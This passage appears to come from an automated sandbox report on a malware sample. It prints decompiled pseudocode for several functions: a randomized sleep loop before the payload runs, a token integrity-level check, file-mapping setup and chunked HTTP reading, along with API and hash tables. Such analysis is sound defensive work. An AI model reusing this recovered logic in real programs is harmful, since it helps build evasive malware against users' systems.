                                                                                                                                                                                                                                0x00a81dfd
                                                                                                                                                                                                                                0x00a81e01
                                                                                                                                                                                                                                0x00a81e07
                                                                                                                                                                                                                                0x00a81e0c
                                                                                                                                                                                                                                0x00a81e11
                                                                                                                                                                                                                                0x00a81e14
                                                                                                                                                                                                                                0x00a81e17
                                                                                                                                                                                                                                0x00a81e1c
                                                                                                                                                                                                                                0x00a81e1d
                                                                                                                                                                                                                                0x00a81e20
                                                                                                                                                                                                                                0x00a81e25
                                                                                                                                                                                                                                0x00a81e2c
                                                                                                                                                                                                                                0x00a81e36
                                                                                                                                                                                                                                0x00a81e38
                                                                                                                                                                                                                                0x00a81e39
                                                                                                                                                                                                                                0x00a81e3c
                                                                                                                                                                                                                                0x00a81e58
                                                                                                                                                                                                                                0x00a81e5e
                                                                                                                                                                                                                                0x00a81e62
                                                                                                                                                                                                                                0x00a81eb0
                                                                                                                                                                                                                                0x00a81e64
                                                                                                                                                                                                                                0x00a81e71
                                                                                                                                                                                                                                0x00a81e81
                                                                                                                                                                                                                                0x00a81e89
                                                                                                                                                                                                                                0x00a81e9b
                                                                                                                                                                                                                                0x00a81e9f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a81e8b
                                                                                                                                                                                                                                0x00a81e8e
                                                                                                                                                                                                                                0x00a81e93
                                                                                                                                                                                                                                0x00a81e95
                                                                                                                                                                                                                                0x00a81e95
                                                                                                                                                                                                                                0x00a81e73
                                                                                                                                                                                                                                0x00a81e75
                                                                                                                                                                                                                                0x00a81ea1
                                                                                                                                                                                                                                0x00a81ea2
                                                                                                                                                                                                                                0x00a81ea2
                                                                                                                                                                                                                                0x00a81e71
                                                                                                                                                                                                                                0x00a81eb7

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A85790,?,?,4D283A53,?,?), ref: 00A81E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A81E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A81E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A8D2E4,00000004,00000000,00001000,?), ref: 00A81E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?,4D283A53), ref: 00A81E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A81E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?), ref: 00A81EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?,4D283A53), ref: 00A81EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3be096e93b63897431fdb6e1f449f8dfcc6429aff4357ec11ceba1d9e384c520
                                                                                                                                                                                                                                • Instruction ID: 1c48505950a209ce47bae4c8336f01801965f5c1ae8afecb461b3ffcb7b6ae9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3be096e93b63897431fdb6e1f449f8dfcc6429aff4357ec11ceba1d9e384c520
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21A272A40214FBD721FBA4DC45FAE37BDAF94760F244125FA05E71D0E77099069B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A84D07, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A84D07(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa8d270 = _t10;
				if(_t10 != 0) {
					 *0xa8d160 = GetTickCount();
					_t12 = E00A86246(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L00A8B01E();
							_t34 = _t14 + _t16;
							_t18 = E00A8120C(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E00A875DD(_t26) != 0) {
							 *0xa8d298 = 1; // executed
						}
						_t12 = E00A85701(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                                                                                                                0x00a84d07
                                                                                                                                                                                                                                0x00a84d0d
                                                                                                                                                                                                                                0x00a84d0e
                                                                                                                                                                                                                                0x00a84d1a
                                                                                                                                                                                                                                0x00a84d20
                                                                                                                                                                                                                                0x00a84d27
                                                                                                                                                                                                                                0x00a84d37
                                                                                                                                                                                                                                0x00a84d3c
                                                                                                                                                                                                                                0x00a84d43
                                                                                                                                                                                                                                0x00a84d45
                                                                                                                                                                                                                                0x00a84d4a
                                                                                                                                                                                                                                0x00a84d50
                                                                                                                                                                                                                                0x00a84d56
                                                                                                                                                                                                                                0x00a84d60
                                                                                                                                                                                                                                0x00a84d64
                                                                                                                                                                                                                                0x00a84d66
                                                                                                                                                                                                                                0x00a84d6b
                                                                                                                                                                                                                                0x00a84d6c
                                                                                                                                                                                                                                0x00a84d6d
                                                                                                                                                                                                                                0x00a84d72
                                                                                                                                                                                                                                0x00a84d78
                                                                                                                                                                                                                                0x00a84d83
                                                                                                                                                                                                                                0x00a84d84
                                                                                                                                                                                                                                0x00a84d8a
                                                                                                                                                                                                                                0x00a84d90
                                                                                                                                                                                                                                0x00a84d9c
                                                                                                                                                                                                                                0x00a84d9e
                                                                                                                                                                                                                                0x00a84d9e
                                                                                                                                                                                                                                0x00a84da8
                                                                                                                                                                                                                                0x00a84da8
                                                                                                                                                                                                                                0x00a84d29
                                                                                                                                                                                                                                0x00a84d2b
                                                                                                                                                                                                                                0x00a84d2b
                                                                                                                                                                                                                                0x00a84db2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A84D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A85992,?), ref: 00A84D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A84D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A84D6D
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D8A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID: "f
                                                                                                                                                                                                                                • API String ID: 507476733-3364321186
                                                                                                                                                                                                                                • Opcode ID: 4dab9c76fe64342bde5bb3c251fde30eee2bb7b400453a932ed11fa47c67ac9e
                                                                                                                                                                                                                                • Instruction ID: 90fbdb0d37a39949a597938c0ce08e902a46e602f40f5fc011f779ebee539c5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dab9c76fe64342bde5bb3c251fde30eee2bb7b400453a932ed11fa47c67ac9e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93118672A50305ABD710FBB4EC1AF9A77A8AB483A1F104525FA15D61D0FB74D4018B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D700B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E736D700B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x736e9a08);
				E736D7870(__ebx, __edi, __esi);
				_t34 =  *0x736ef120; // 0x1
				if(_t34 > 0) {
					 *0x736ef120 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E736D7453();
					 *(_t82 - 4) = 1;
					__eflags =  *0x736ef460 - 2;
					if( *0x736ef460 != 2) {
						E736D76ED(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x736e9a30);
						E736D7870(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E736D700B(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E736D71C6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x736ef120 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E736D751E(__ebx, _t61, 1, __esi);
						E736D73DA();
						E736D783C();
						 *0x736ef460 =  *0x736ef460 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E736D70A0();
						_t54 = E736D76BF( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E736D70AD();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}
















                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700d
                                                                                                                                                                                                                                0x736d7012
                                                                                                                                                                                                                                0x736d7017
                                                                                                                                                                                                                                0x736d701e
                                                                                                                                                                                                                                0x736d7025
                                                                                                                                                                                                                                0x736d702d
                                                                                                                                                                                                                                0x736d7030
                                                                                                                                                                                                                                0x736d7039
                                                                                                                                                                                                                                0x736d703c
                                                                                                                                                                                                                                0x736d703f
                                                                                                                                                                                                                                0x736d7046
                                                                                                                                                                                                                                0x736d70b5
                                                                                                                                                                                                                                0x736d70ba
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70ca
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D7052
                                                                                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 736D706C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                                                                                • Opcode ID: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
                                                                                                                                                                                                                                • Instruction ID: 86c9b1130994403542d4f57d1ba38c5bb9deead51921a4127dfe88e3e65fea96
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E641C472E21718AFEF119F69DD00FAE7FB5EF84690F15421AE815572C4D7308D018BA6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A859B4, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A859B4(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xa8d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00A85157(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00A853BB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                                                                                                                0x00a859c1
                                                                                                                                                                                                                                0x00a859c8
                                                                                                                                                                                                                                0x00a859cf
                                                                                                                                                                                                                                0x00a859e3
                                                                                                                                                                                                                                0x00a859ee
                                                                                                                                                                                                                                0x00a85a06
                                                                                                                                                                                                                                0x00a85a13
                                                                                                                                                                                                                                0x00a85a16
                                                                                                                                                                                                                                0x00a85a1b
                                                                                                                                                                                                                                0x00a85a26
                                                                                                                                                                                                                                0x00a85a2a
                                                                                                                                                                                                                                0x00a85a39
                                                                                                                                                                                                                                0x00a85a3d
                                                                                                                                                                                                                                0x00a85a59
                                                                                                                                                                                                                                0x00a85a59
                                                                                                                                                                                                                                0x00a85a5d
                                                                                                                                                                                                                                0x00a85a5d
                                                                                                                                                                                                                                0x00a85a62
                                                                                                                                                                                                                                0x00a85a66
                                                                                                                                                                                                                                0x00a85a6c
                                                                                                                                                                                                                                0x00a85a6d
                                                                                                                                                                                                                                0x00a85a74
                                                                                                                                                                                                                                0x00a85a7a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A859E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A85A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A85A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A85A66
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A85A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A85A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A85A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                • Opcode ID: 2902819b53bfb2e3c1fc45703304a578713ee82f02ebc7f7eae3e098c0160b58
                                                                                                                                                                                                                                • Instruction ID: 5dc3cee32e767c9520c9dd5c0aa8a4e1ea7658a9c30ed0da4880d3cb0561bbeb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2902819b53bfb2e3c1fc45703304a578713ee82f02ebc7f7eae3e098c0160b58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35212C75D00209FFEB00EFA4DC88DEEBBB9EF04344F100165E911A61A1D7718A46DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8202A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E00A8202A(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0xa8d130(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00A85157(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xa8d2a4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00A853BB(_v20);
							if(_v8 == 0) {
								_t52 = E00A850DE(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                                                                                                                                                                                                                                0x00a82032
                                                                                                                                                                                                                                0x00a82035
                                                                                                                                                                                                                                0x00a8203e
                                                                                                                                                                                                                                0x00a82041
                                                                                                                                                                                                                                0x00a82044
                                                                                                                                                                                                                                0x00a8204c
                                                                                                                                                                                                                                0x00a8214a
                                                                                                                                                                                                                                0x00a82150
                                                                                                                                                                                                                                0x00a82158
                                                                                                                                                                                                                                0x00a82160
                                                                                                                                                                                                                                0x00a82167
                                                                                                                                                                                                                                0x00a82167
                                                                                                                                                                                                                                0x00a8215a
                                                                                                                                                                                                                                0x00a8215d
                                                                                                                                                                                                                                0x00a8215d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8215d
                                                                                                                                                                                                                                0x00a82055
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82062
                                                                                                                                                                                                                                0x00a8206a
                                                                                                                                                                                                                                0x00a82141
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82141
                                                                                                                                                                                                                                0x00a82076
                                                                                                                                                                                                                                0x00a8207b
                                                                                                                                                                                                                                0x00a82080
                                                                                                                                                                                                                                0x00a8212f
                                                                                                                                                                                                                                0x00a82136
                                                                                                                                                                                                                                0x00a82136
                                                                                                                                                                                                                                0x00a8213c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82086
                                                                                                                                                                                                                                0x00a82086
                                                                                                                                                                                                                                0x00a82086
                                                                                                                                                                                                                                0x00a82086
                                                                                                                                                                                                                                0x00a8208b
